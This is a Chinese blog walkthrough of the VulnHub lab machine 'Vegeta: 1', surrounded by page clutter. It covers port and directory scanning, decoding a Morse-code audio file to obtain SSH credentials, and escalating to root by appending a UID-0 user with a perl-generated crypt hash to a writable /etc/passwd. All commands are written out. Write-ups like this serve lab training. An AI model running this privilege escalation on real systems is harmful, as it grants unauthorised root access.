vulnhub Vegeta: 1

最新推荐文章于 2024-01-02 00:40:45 发布
最新推荐文章于 2024-01-02 00:40:45 发布
阅读量563 收藏 1
点赞数 1
分类专栏: vulnhub 文章标签: gobuster 摩斯电码 passwd perl crypt
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/elephantxiang/article/details/125418032
版权

渗透思路:

nmap扫描----gobuster扫描网站目录----在线解码摩斯电码,得到ssh用户名密码----/etc/passwd写入用户提权

环境信息:

靶机:192.168.101.77

攻击机:192.168.101.34

具体步骤:

1、nmap扫描

sudo nmap -sV -sC -p- 192.168.101.77

2、dirb扫描网站目录(兔子洞)

​dirb http://192.168.101.77

发现http://192.168.101.77/robots.txt

(下面是一个兔子洞)

浏览器访问http://192.168.101.77/robots.txt,发现/find_me

浏览器访问/find_me,点击find_me.html,并查看网页源代码

view-source:http://192.168.101.77/find_me/find_me.html

拉到最下面发现一大段注释(没啥用就不复制粘贴了)

base64解码之后还是一堆没有意义的乱码,此路不通

3、gobuster扫描网站目录

​gobuster dir -u http://192.168.101.77/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

扫描到/bulma

http://192.168.101.77/bulma/是个目录,里面有个文件hahahaha.wav

下载下来听了一下,感觉是摩斯电码

4、在线解码摩斯电码,得到ssh用户名密码

找了个在线翻译器:Morse Code Audio Decoder | Morse Code World

按upload上传hahahaha.wav,然后按play,自动转为文本信息

得到的结果是

USES: TRUNKS PASSWORD : US3R(S IN DOLLPS SYMBOL)

以用户名trunks,密码u$3r进行ssh登录

ssh trunks@192.168.101.77

5、/etc/passwd写入新用户提权

查看/home/trunks/.bash_history,发现其中有向/etc/passwd写入新用户的操作

查看/etc/passwd的文件权限

ls -al /etc/passwd

发现trunks用户有写权限

参考/home/trunks/.bash_history中的命令,先用perl生成加密的用户密码

perl -le 'print crypt("123456","addedsalt")'

以上命令中,用户的明文密码为123456

然后再将新用户test写入/etc/passwd

echo "test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash" >> /etc/passwd

最后切换到test用户,输入密码123456,获得root权限,并在/root目录下找到root.txt

su - test

仙女象
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机13 VEGETA: 1
honest_gg的博客
10-09 1534
这是一个完整的初学者的机器,获取标志
vulnhubvegeta
weixin_54431413的博客
07-07 399
首先拿到一串base64加密数据,进行解密,是二维码,提取出一个密码,但是这是迷惑我们的。在bulma下,拿到摩斯密码音频,进行分析,得到账号密码,突破边界。/etc/passwd权限过大,直接创建root。...
Vulnhub靶机:VEGETA_ 1
LainWith的博客
10-05 1010
Vegeta(此系列共1台)发布日期:2020年6月28日难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径枚举摩尔斯码数据编码还原二维码解码本地提权。
vulnhub靶场vegeta 详解喔
最新发布
m0_73255659的博客
01-02 887
vegeta 靶机。
Vegeta靶机打靶过程及思路
qq_52610024的博客
07-21 278
7.发现/etc/passwd目录下可以写,写入一个管理员账号,成功拿到root权限,打靶完成。3.使用zbarimg工具进行读取但是没有得到任何有效信息,解码得到的文字并不是登录密码。4.再次使用超大型字典进行扫描,发现bulma这个极为隐蔽的目录,音频是一段摩尔电码。2.发现只有80端口可以突破,于是进行大字典的扫描,得到某个目录下存在一张图片。5.对该摩尔电码进行解码,得到用户名和密码。6.ssh登录成功突破,打点完成。1.常规端口扫描及发现。......
vegeta:HTTP负载测试工具和库。 超过9000!
02-02
您可以在Mac OS X上使用软件包管理器安装Vegeta: $ brew update && brew install vegeta 资源 你需要go安装和GOBIN在你的PATH 。 完成后,运行命令: $ go get -u github.com/tsenart/vegeta 版本控制 库和CLI均...
vegeta:包装器脚本和Dockerfile,用于在集线器上自动化vegeta docker映像
05-19
该脚本允许将一些vegeta参数设置为环境变量,同时提供一些没有它们的合理默认值。 接下来,我们只是提供一个Dockerfile实现自动化码头工人形象建设上正式 luser@lolcathost: ~ $ docker pull perfci/vegeta luser@...
Vegeta:HTTP负载测试工具和库。 超过9000!-开源
04-25
您可以在Mac OS X上使用Homebrew软件包管理器安装Vegeta。库和CLI均使用SemVer v2.0.0进行版本控制。 在v8.0.0之后,将分别对这两个组件进行版本控制,以更好地隔离每个组件的重大更改。 CLI版本使用cli / vMAJOR....
docker-vegeta:强调您的架构从无数 docker 容器中进行 HTTP 负载测试
07-06
root@cb6740a3f8b7:/go# echo "GET https://example.com/" | vegeta attack -duration=3s -rate=5 -timeout=1m | tee results.bin | vegeta report Requests [total] 15 Duration [total, attack, wait] 2....
vegeta-server:用于vegeta的RESTful API服务器,这是用Go编写的负载测试工具
02-06
Vegeta Server-RESTful负载测试服务用于RESTful API服务器,这是一种用编写的负载测试工具。 Vegeta是一种多功能的HTTP负载测试工具,其构建目的是为了以恒定的请求速率钻取HTTP服务。 vegeta库是用Go编写的,因此...
Vegeta靶机总结
qq_45301512的博客
12-24 393
修改vegeta靶机的网络连接模式为NAT,然后发现使用nmap扫描,没有发现ip,然后百度修改了vegeta虚拟机,获得了ip百度的帖子: https://www.cnblogs.com/asstart/p/12626494.html再次使用nmap扫描网段,获得了ip,并且根据80端口打开了网站继续目录扫描根据获得的信息,依次去打开网站查看http://192.168.11.135/admin 下面只有个admin.php,并且打开什么也没有。
Linux Network Namespace
风格色的博客
06-28 398
创建两个network namespace并互相连接 1. 创建Veth pair 先创建两个netns(test1和test2) sudo ip netns add test1 sudo ip netns add test2 什么是veth pair Veth pair 是一对虚拟网卡,从一张veth网卡发出的数据包可以直接到达它的peer veth,两者之间存在着虚拟链路。 s...
zipkin
_trymybest的博客
01-18 106
http://zipkin.io/pages/quickstart load test: https://github.com/tsenart/vegeta https://github.com/avajs/ava#usage https://github.com/buger/goreplay
2012-04-10日常记录
weixin_30677073的博客
04-10 74
任何一个小问题,发现问题,解决问题。 开会前发文档,表明会议议题,所有与会人员前10分钟到,略会议议题,避免会议期间不明白之处,减少瞎扯淡的时间。 建议系统的每个界面都需要帮助文档,减轻大用户软件的服务成本。 要严格控制进入数据库的每个字段大小,任何外来系统的数据进入系统前都要进行严格的数据规则筛选。 转载于:https://www.cnblogs.com/gaolijun1986/arch...
最中二的性能测试工具--vegeta
测试萌萌
03-01 988
在github上翻到一个项目,名字叫vegeta,看到这个单词,你的第一反应是什么? 说来惭愧,我的第一反应是这个单词很奇怪,并不认识。 直到我往下翻,看到了这样一幅场景。
linux下 修改/etc/passwd文件添加用户要点,linux下添加删除,修改,查看用户和用户组...
weixin_42405368的博客
05-01 3097
一、组操作1、创建组:groupadd test #增加一个test组2、修改组groupmod -n test2 test #将test组的名子改成test23、删除组groupdel test2 #删除 组test24、查看组a),查看当前登录用户所在的组groups,查看apacheuser所在组groups apacheuserb),查看所有组cat /etc/groupc...
llinux 写/etc/passwd文件添加用户
qq_41631806的博客
04-07 4351
llinux 写/etc/passwd文件添加用户(openssl passd加密) 前言 在做vulnhub靶机——AI-web-1 .0的时候,getshell用户具有/etc/passwd写权限,/etc/shadow无读写权限。傻子将/etc/passwd密码直接以明文写进去,不能登录。 前提操作用户对文件/etc/passwd有写权限。 一、简单介绍/etc/passwd文件格式: 详细...
全流程+讲解+避坑指南 第一次使用vulhub搭建漏洞环境
热门推荐
luluoluoa的博客
04-03 2万+
vulhub介绍 vulhub是一个开源漏洞靶场,可以在安装 docker和docker-compose 后,使用简单的指令搭建漏洞环境,具体介绍可以看官网。可以安装在windows、linux上。 vulhub官网:https://vulhub.org/#/index/ docker介绍 docker意思就是容器,可以把我们配置好的环境等打包到这个容器里,使用的时候就可以直接使用它的镜像。这个容器可移植性强,很方便,有windows和linux版本。docker也有很多用法,但是我们这里是为了使用
vegeta 压测使用简单介绍
jack_user_admin的博客
11-02 1893
1.在安装好了vegeta 之后,即可直接使用 2.使用方式:执行如下命令 vegeta attack -targets=“test3.txt” -rate=500 -connections=1 -duration=1s | tee results.bin | vegeta report 命令含义: attack 打印版本并且退出 -targets=“test3.txt” 指定目标文件,默认为标准输入 -rate=500 指定每秒钟对目标发送的请求数(每秒请求多少次) -con
nginx压测工具有哪些好用的
06-06
1. ApacheBench(ab):ab是一个轻量级的HTTP压测工具,它是Apache服务器自带的工具,使用简单,支持并发连接数、请求次数、请求速率等参数设置。 2. wrk:wrk是一个现代的HTTP压测工具,它使用Lua脚本编写测试用例...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值